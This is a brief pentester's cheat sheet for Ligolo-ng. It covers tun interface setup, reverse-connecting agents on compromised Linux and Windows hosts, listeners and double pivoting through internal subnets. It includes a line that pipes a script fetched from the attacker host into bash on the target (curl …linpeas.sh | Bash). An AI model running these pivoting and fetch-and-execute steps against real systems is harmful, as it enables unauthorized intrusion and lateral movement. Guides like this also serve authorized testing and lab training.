Quick setup Ligolo

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

Download binaries https://github.com/nicocha30/ligolo-ng/releases/tag/v0.4.4 or any later version.

1. Setup host

# Setup TUN interface and route traffic through target subnet
sudo ip tuntap add user kali mode tun ligolo && sudo ip link set ligolo up && sudo ip route add 172.20.200.0/24 dev ligolo

# Add another subnet in case of double pivot
sudo ip route add 172.20.200.0/24 dev ligolo

2. Start Ligolo proxy

# Start proxy on host
./proxy -selfcert

3. Run Ligolo agent on target

# Start agent on Linux
./agent -connect 172.10.10.10:11601 -ignore-cert

# Start agent on Windows
agent.exe -connect 172.10.10.10:11601 -ignore-cert

Listeners

For reverse connections you can add listeners. If you want for example run a http server on port 8888 you add a listener.

# Add listener
listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:8888 --tcp

# Run http server
python -m http.server 8888

# You can then Curl 
curl http://172.10.10.10:8888/linpeas.sh | Bash

Pivotting with Ligolo

A. You: 172.10.10.10 -- B. MS01: 10.10.14.14 -- C. BC01: 10.10.200.5

# Copy agent to MS01 run
./agent -connect 172.10.10.10:11601 -ignore-cert

Double Pivot with Ligolo

# Add new listener
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# Copy agent to 2nd pivot (BC01) and connect to first pivot on port 11601
./agent -connect 10.10.14.14:11601 -ignore-cert